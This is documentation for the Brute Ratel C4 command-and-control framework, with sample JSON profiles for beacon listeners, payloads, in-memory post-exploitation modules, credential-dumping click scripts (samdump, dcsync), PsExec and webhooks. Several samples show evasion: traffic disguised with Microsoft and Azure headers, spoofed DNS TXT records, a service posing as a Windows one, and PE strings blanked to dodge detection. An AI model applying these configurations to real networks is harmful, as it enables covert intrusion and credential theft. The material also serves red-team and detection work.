C4 Profiles

Brute Ratel profiles provide a variety of ways to automate the configuration of the server. You can configure a server from the Commander and export the profile from server to your local machine, or build one manually from scratch. The profiles are in JSON format which makes it much easier to build profiles. Everything that you configure from the Commander, can be done from the JSON configuration as well. C4 profiles make an operator’s life easier by avoiding the tasks of building a profile over and over again, and provides the ease of migration from one server to another at just the click of a button.

Listener Profile

Listener profiles can be written in json to autostart the listeners when you start the Ratel server. Only HTTP/HTTPS listeners (DOH inclusive) can be configured to autostart, since the SMB and TCP listeners are run directly on the badgers during pivoting. Below is a quick example of a HTTPS Listener containing a JSON malleable profile and a DNS over HTTPS profile which should be self-explanatory. All options are not mandatory to be added. When you create a new listener using the Commander, it will autogenerate these profiles and store them in memory. These can be saved offline using the ‘View Configuration’ button above scratchpad and used later when you create another server.

{
    "listeners": {
        "Primary-Https": {
            "auth_count": 1,						// number of authentication keys
            "auth_type": false,						// false = Regular keys, true = One Time Auth keys
            "c2_authkeys": [
                "abcd@123"						// comma seperated authentication keys in an array
            ],
            "c2_uri": [
                "content.php",						// command seperated URIs in an array
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {						// any extra headers in key/value format
                "Cache-Control": "no-cache",
                "Cookie": "1babbba6265ca2eba78b6",
                "Host": "test.azureedge.net",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",					// bind host to listen on
            "is_random": false,						// should be 'false'. It is usually created by the server to autogenerate keys. Reserved for future use
            "os_type": "windows",					// should be 'windows'. Reserved for future use.
            "port": "443",						// port to listen on
            "rotational_host": "192.168.0.142",				// rotational hosts seperated by commas
            "ssl": true,					        // ssl enabled or disabled
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",		// useragent for the payload
            "die_offline": true						// should be 'true' or 'false. This kills the payload if internet connectivity is not available during initial conenction.
            "proxy": "https://192.168.0.102:8081"		        // optional proxy server for the payload to connect to, can be http or https
        },
        "Primary-DOH": {
            "auth_count": 1,                        // number of authentication keys
            "auth_type": false,                     // false = Regular keys, true = One Time Auth keys
            "c2_authkeys": [
                "abcd@123"                          // comma seperated authentication keys in an array
            ],
            "c2_uri": [
                "dns-query"                         // command seperated URIs in an array
            ],
            "extra_headers": {                      // any extra headers in key/value format
                "Content-Type": "application/dns-message"
            },
            "host": "192.168.0.142",                // bind host to listen on
            "is_random": false,                     // should be 'false'. It is usually created by the server to autogenerate keys. Reserved for future use
            "os_type": "windows",                   // should be 'windows'. Reserved for future use.
            "port": "443",                          // port to listen on
            "dnshost": "dns1.evasionlabs.com",      // DNS hosts to be queried
            "rotational_host": "dns.google",        // rotational DNS servers seperated by commas
            "idleA": "8.8.4.4",                     // IP to respond for A records request for no commands in listener bucket
            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",        // spoofed TXT records exposed to public
            "checkinA": "8.8.8.8",                  // IP to respond for A records request for checking in
            "ssl": true,                            // ssl enabled or disabled
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ",        // useragent for the payload
            "die_offline": true                     // should be 'true' or 'false. This kills the payload if internet connectivity is not available during initial conenction.
            "proxy": "https://192.168.0.102:8081"   // optional proxy server for the payload to connect to, can be http or https
        }
    }
}

Every time your create a new listener, a payload profile is created automatically and stored in the Payload Profilers section. They can be viewed in the Commander by selecting C4 Profiler->Payload Profiler. Payload profiles are stored independently of the listener profile. This means if you modify and save your payload profile, it doesn’t affect the listener config.

Payload Profiles (Ratel Server)

Payload profiles provide a variety of options to configure and build payloads. These payload configurations work independent of the Listener Profiles. This means you can edit, delete or create new profiles and use them dynamically during process injections, profile migration or to create new executable/shellcode/dll/ps1 or service executables out of them. There are 4 types of payload profiles.

  • DOH (DNS over HTTPS)
  • HTTP/HTTPS
  • TCP
  • SMB

You can also store profiles for your backup Command and Control Center in your current C2 and use them to inject the backup-c2’s profile directly in your current payload, thus allowing you to switch C2s without needing to drop a file on disk. Below are a few examples of all the payload profiles which should be self-explanatory.

{
    "payload_config": { 								// This config is similar to that of the listeners config.
        "auto-Primary-Https": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": "no-cache",
                "Cookie": "1babbba6265ca2eba78b6",
                "Host": "test.azureedge.net",
                "Pragma": "no-cache",
                "Referer": "https://mail.microsoft.com",
                "x-pm-apiversion": "3",
                "x-pm-appversion": "Web_3.16.33",
                "x-pm-uid": "d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "port": "443",
            "ssl": true,
            "type": "HTTP",							        // type should be HTTP for HTTP payload configurations
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "die_offline": true						                // should be 'true' or 'false. This kills the payload if internet connectivity is not available during initial conenction.
            "proxy": "https://192.168.0.102:8081"		                        // optional proxy server for the payload to connect to, can be http or https
        },
        "auto-doh-c2": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "dns-query"
            ],
            "checkinA": "8.8.8.8",
            "die_offline": false,
            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",
            "extra_headers": {
                "Content-Type": "application/dns-message"
            },
            "host": "dns.google",
            "idleA": "8.8.4.4",
            "port": "443",
            "ssl": true,
            "type": "DOH",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        },
        "main_smb": {								// SMB payload profile example
            "c2_auth": "abcd@123",						// key to authenticate with the server. This should be the same as that of the HTTP listener
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",				// the named pipe on which to communicate over SMB
            "type": "SMB"							// type should be SMB for SMB payload configurations
        },
        "main_tcp": {								// TCP payload profile example
            "c2_auth": "abcd@123",						// key to authenticate with the server. This should be the same as that of the HTTP listener
            "host": "127.0.0.1",						// host to connect back to. This should be the IP where a badger is listening using the 'pivot_tcp' command
            "port": "10000",						        // port to connect to the badger's TCP listener
            "type": "TCP"							// type should be TCP for TCP payload configurations
        }
    }
}

Command Profile

C4 profiles allow users to configure custom commands. C4 profiles can be configured to use reflective DLLs using the register_dll command, C# PE using the register_pe command and PIC object files using register_obj command. The register_dll command can be used to configure how a reflective DLL get’s placed in memory, and if certain strings need to be extracted before copying the DLL to memory and executing it.

Register a Reflective DLL as an internal BRc4 Command (fork and run)

The register_dll profile can be used to register your own reflective DLL as an internal command for the Ratel server. This means whenever you type your command name (boxreflect in this example), it will execute the DLL in the ‘file_path’ key (this key is local to the server) using the loadr command on the badger. These profiles will also show up in the ‘help’ section of the badger’s terminal.

{
    "register_dll": {                                                   // registers a reflective DLL as an internal command of badger
        "boxreflect": {                                                 // name of the command which you would enter in the badger's terminal to execute the dll (uses 'loadr' to execute the dll)
            "file_path": "server_confs/boxreflect.dll",                 // path of the DLL with accessible to the ratel server
            "arch" : "x64",                                             // this can be x64 or x86 depending upon the type of your dll
            "description": "Loads a test reflective dll message box",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                                       // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                                           // compulsary arguments needed for the DLL to run
            "optionalArg": "NA",                                        // optional arguments which can be supplied to the DLL
            "example": "boxcheck",                                      // example as to how to execute the DLL
            "minimumArgCount": 1,                                       // minimum count of arguments required for the DLL to run. If the argument supplied is less than this, the help would be printed to the screen
            "replace_str": {                                            // replace the below strings with respective hex values before execution. The size of the hex values should be the same as that of the strings
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    }
}

Register a C-Sharp executable as an internal BRc4 Command (fork and run)

The register_pe profile can be used to execute C-sharp executables in the memory of a target process. The target process can be configured separately. This profile executes the C-sharp executable using the sharpreflect command in the badger.

{
    "register_pe": {                                        // registers a C# PE as an internal command of badger
        "seatbelt": {                                       // name of the command which you would enter in the badger's terminal to execute the PE (uses 'sharpreflect' to execute the PE file)
            "file_path": "server_confs/Seatbelt.exe",       // path of the PE with accessible to the ratel server
            "description": "Runs Seatbelt C# executable",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsary arguments needed for the PE to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the PE
            "example": "seatbelt",                          // example as to how to execute the PE
            "minimumArgCount": 1                            // minimum count of arguments required for the PE to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Register a C-Sharp executable as an internal BRc4 Command to be run inline (No fork and run)

This command is similar to the register_pe profile, except that this is used alongside the sharpinline command to run the C-Sharp executable in the current process itself.

{
    "register_pe_inline": {                                 // registers a C# PE as an internal command of badger
        "seatbelt": {                                       // name of the command which you would enter in the badger's terminal to execute the PE (uses 'sharpreflect' to execute the PE file)
            "file_path": "server_confs/Seatbelt.exe",       // path of the PE with accessible to the ratel server
            "description": "Runs Seatbelt C# executable",   // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsary arguments needed for the PE to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the PE
            "example": "seatbelt",                          // example as to how to execute the PE
            "minimumArgCount": 1                            // minimum count of arguments required for the PE to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Register a BOF as an internal BRc4 Command to be run inline (No fork and run)

The register_obj is used to run Badger Object Files (BOFs) in memory. The BOFs are executed using the coffexec command in the badger.

{
    "register_obj": {                                       // registers an object file as an internal command of badger
        "o_getprivs": {                                     // name of the command which you would enter in the badger's terminal to execute the object file
            "arch" : "x64",                                 // this can be x64 or x86 depending upon the type of your object file
            "file_path": "server_confs/getprivs.o",         // path of the object file with accessible to the ratel server
            "description": "Get privilege of current user", // description to show in the help of the badger's terminal
            "artifact": "WINAPI",                           // artefact to show in the help of badger's terminal. (WINAPI or NA)
            "mainArgs": "NA",                               // compulsary arguments needed for the object file to run
            "optionalArg": "NA",                            // optional arguments which can be supplied to the object file
            "example": "o_getprivs",                        // example as to how to execute the object file
            "minimumArgCount": 1                            // minimum count of arguments required for the object file to run. If the argument supplied is less than this, the help would be printed to the screen
        }
    }
}

Badger Profile

NOTE: Badger profiles should not be created manually. Only the pre-created ones from the server should be used.

Badger profiles are just configurations of badger which were at some point of time loaded into the server. Whenever a badger connects to the server for the first time, the server stores a bunch of metadata in memory to identify the connection for later use. These metadata can be extracted from the server and stored in a configuration file, where, if for some reason you want to kill and start the server again without losing the badgers, then you can use the ‘-b’ command-line argument with the json file containing the configuration of the badger. This will restore all the metadata and the tokens used by the badgers for authentication to the server. The badger profiles should look this:

{
    "badgers": {
        "b-0": {                                            // id of the badger
            "b_bld": "18363",                               // host os build version
            "b_c2": "https://192.168.0.142:443",            // http or https port and domain for your payload
            "b_c2_id": "Primary-Https",                     // name of your listener
            "b_cookie": "QQD7QGSMCCTV66OU5C8GAQTQNTU8H7MD", // cookie to authenticate from
            "b_h_name": "DESKTOP-G15FRLS",                  // hostname of the badger
            "b_l_ip": "192.168.0.142",                      // external Ip of badger
            "b_p_name": "Z:\\documents\\badger.exe",        // path of badger
            "b_pid": "7268",                                // pid of badger
            "b_seen": "09-05-2021 09:14:19",                // last seen date of badger
            "b_uid": "vendetta",                            // username of badger
            "b_wver": "10.0",                               // host os version
            "is_pvt": false,                                // this should be false, unless the badger is a pivot badger (smb or tcp)
            "pipeline": "Direct",                           // this should be Direct unless the badger is a pivot badger
            "pvt_master": ""                                // this should be empty, unless the badger is a pivot badger
        }
    }
}

Badger configurations are stored in the logs directory under the name badger_tokens.conf. You can restore the badgers using the below command:

./brute-ratel-linx64 -ratel -c server_confs/c4profile.conf -b logs/badger_tokens.conf

Other Profiles

The C4 profile of badger can host a ton of other information for automation, other the ones seen in the previous documentation. Below is a sample configuration which explains the nature of each of these profiles:

Operators

When using C4 profiles, you would need to provide an admin username and password in the C4 profile. They can be added using the below json configuration. Similar to adding admin operators, multiple non-admin operators can also be added to the server for collaboration.

{
    "admin_list": {
        "admin": "pass123"
    },
    "user_list": {
        "operator1": "password123",
        "operator2": "password456"
    }
}

Profile Autosave

Brute Ratel server’s configuration can be viewed and backed up offline. This comes in handy if you want to start another Ratel Server instance but don’t want to build a new C4 Profile. The autosave option, when enabled, will automatically save the profile to disk and update it every 30 seconds.

{
    "auto_save": true
}

This can also be enabled from the Commander by clicking the ‘Autosave Disabled’ button

Click Scripts

Click Scripting is a feature which allows operators to automate execution of bulk commands. Unlike the ‘Autoruns’ feature which lets an operator to auto-execute several commands on the first connection of badger, Click Scripts are a list of multiple commands which can be chained together to execute one command after the other at any point of time. This helps with automated execution of commands belonging to different Tactics and Techniques of MITRE ATT&CK which can be chained together during a Purple Team engagement. Below is an example of some discovery based commands which are grouped into a single click script called ‘Discovery’. This script can also be created from the Commander by selecting C4 Profiler->Clickscripts. To run these clickscripts, right click a badger, load a clickscript and click the run button.

{
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    }
}

Autoruns

Brute Ratel can automate initial command execution for badgers using the autoruns profile. Commands added to the autoruns profile will be auto executed on every badger whenever they connect for the first time. These autoruns can be configured either by adding them manually in Commander or via the profile below.

{
    "autoruns": [
        "sleep 60 30",
        "set_child werfault.exe",
        "id",
        "userinfo",
        "dcenum"
    ]
}

C2 Handler

The C2 handler profile starts the handler on the provided IP and port. This is where the Commander connects over websocket to send and receive requests from the server (your API server port).

{
    "c2_handler": "0.0.0.0:8443"
}

Encryption In Transit

Brute Ratel uses a custom encryption algorithm to encrypt the data on network between badgers and the c4 server. This encryption is performed using either a random key or one provided by the operator. If an operator does not provide an encryption key, the server generates it randomly. This layer of encryption rests below the SSL layer. If any Network-based EDR or network intrusion detection system like Zeek/BRO tries to sniff the traffic using ssl decryption, the inner layer would still be encrypted and appear garbage to the network intrusion detection system. This encryption key can be provided inside the C4 profile as shown below.

{
    "comm_enc_key": "WeiJeeWeiCufae2y"
}

Credentials

Pre-existing credentials (breached credentials) or credentials harvested during phishing can be used to create Windows Access Tokens for lateral movement. They can be created using the make_token command or added to the server using a profile or from the Commander. Once added, an operator can select this from the Commander to create a local or network token for lateral movement.

{
    "credentials": [
        {
            "creddomain": "bruteratel.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        },
        {
            "creddomain": "jupiter.solar.corp",
            "crednote": "Domain Admin Password",
            "credpass": "jupiter@123",
            "creduser": "administrator"
        }
    ]
}

PsExec

The PsExec profile can be used to configure the service name and description for remote service creation with the psexec command. This can also be changed from the C4 Profiler->Psexec Config option in the Commander.

{
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10.",
        "psexec_svc_name": "TransactionBrokerService"
    }
}

SSL Profile

The SSL profile specifies the path of the SSL certificate and key used to start the HTTPS/DOH Listeners and the Websocket Handler for the Commander.

{
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem"
}

Webhook

Webhook in Brute Ratel is a method of forwarding the responses of the badgers to a self-hosted SSL server using HTTPS callbacks. These callbacks may be maintained, modified, and managed by operators of the BRc4. The BRc4 listeners support webhooks for two types of Badger Comms. This can be enabled by right clicking a listener and selecting the ‘Webhook’ option or using a profile as follows. The webhooks when combined with the automation of API server can be extremely powerful to parse the response of the badger and send some other automated command in return using the API.

{
    "webhook_listener": {                               // this config enables webhook listener for the configured C2
        "myc2": {                                       // name of the listener to enable webhook for
            "badger_init": true,                        // example of enabling notifications for initial connections from badger via webhook callbacks
            "badger_log": false,                        // example of enabling full badger logs for initial connections from badger via webhook callbacks
            "webhook_host": "https://localhost:9443"    // webhook listener host ip, port and URI if any
        }
    }
}

Sample Profile

Below is an example of a sample profile:

{
    "admin_list": {
        "admin": "admin@123"
    },
    "auto_save": false,
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    },
    "autoruns": [
        "set_child searchprotocolhost.exe",
        "sleep 1"
    ],
    "c2_handler": "0.0.0.0:8443",
    "comm_enc_key": "WeiJeeWeiCufae2y",
    "credentials": [
        {
            "creddomain": "darkvortex.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        }
    ],
    "listeners": {
        "json-c2": {
            "append": "\"}",
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "en/ec2/pricing/",
                "?locale=en"
            ],
            "die_offline": false,
            "extra_headers": {
                "content-type": "application/json"
            },
            "host": "172.16.219.1",
            "is_random": true,
            "os_type": "windows",
            "port": "443",
            "prepend": "{\"channel\":\"",
            "rotational_host": "172.16.219.1",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "proxy": "https://192.168.0.150:8081"
        },
        "xml-c2": {
            "append": "</description>\n    </add>\n</batch>\n",
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "previous-versions/windows",
                "latest/developerguide/documents-batch-xml.html"
            ],
            "die_offline": false,
            "extra_headers": {
                "Content-Type": "application/xhtml+xml"
            },
            "host": "172.16.219.1",
            "is_random": true,
            "os_type": "windows",
            "port": "80",
            "prepend": "<?xml version=\"1.0\"?>\n<batch>\n    <add id=\"tt0484562\">\n        <author>Gambardella, Matthew</author>\n        <title>XML Developer's Guide</title>\n        <genre>Computer</genre>\n        <price>44.95</price>\n        <publish_date>2000-10-01</publish_date>\n        <description>",
            "rotational_host": "172.16.219.1",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
        },
        "doh-c2": {
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "dns-query"
            ],
            "extra_headers": {
                "Content-Type": "application/dns-message"
            },
            "checkinA": "8.8.8.8",
            "die_offline": false,
            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",
            "rotational_host": "dns.google",
            "host": "172.16.219.1",
            "idleA": "8.8.4.4",
            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",
            "is_random": true,
            "os_type": "windows",
            "port": "53",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        }
    },
    "payload_config": {
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        }
    },
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",
        "psexec_svc_name": "TransactionBrokerService"
    },
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem",
    "user_list": {
        "brute": "brute123",
        "ratel": "ratel123"
    },
    "register_obj": {
        "boftest64": {
            "arch": "x64",
            "file_path": "server_confs/sample_bof/decltest64.o",
            "description": "Sample BOF file to show x64 capabilities",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "decltest64",
            "minimumArgCount": 1
        },
        "boftest86": {
            "arch": "x86",
            "file_path": "server_confs/sample_bof/decltest86.o",
            "description": "Sample BOF file to show x86 capabilities",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "decltest86",
            "minimumArgCount": 1
        }
    },
    "register_pe": {
        "seatbelt": {
            "file_path": "server_confs/Seatbelt.exe",
            "description": "Runs Seatbelt C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "seatbelt",
            "minimumArgCount": 1
        }
    },
    "register_pe_inline": {
        "monologue": {
            "file_path": "server_confs/InternalMonologue.exe",
            "description": "Runs InternalMonologue C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "monologue",
            "minimumArgCount": 1
        }
    },
    "register_dll": {
        "boxreflect": {
            "arch": "x64",
            "file_path": "server_confs/boxreflect.dll",
            "description": "Loads a test reflective dll message box",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "boxcheck",
            "minimumArgCount": 1,
            "replace_str": {
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    },
    "webhook_listener": {
        "json-c2": {
    	    "badger_init": false,
    	    "badger_log": false,
            "webhook_host": "https://localhost:9443"
        }
    }
}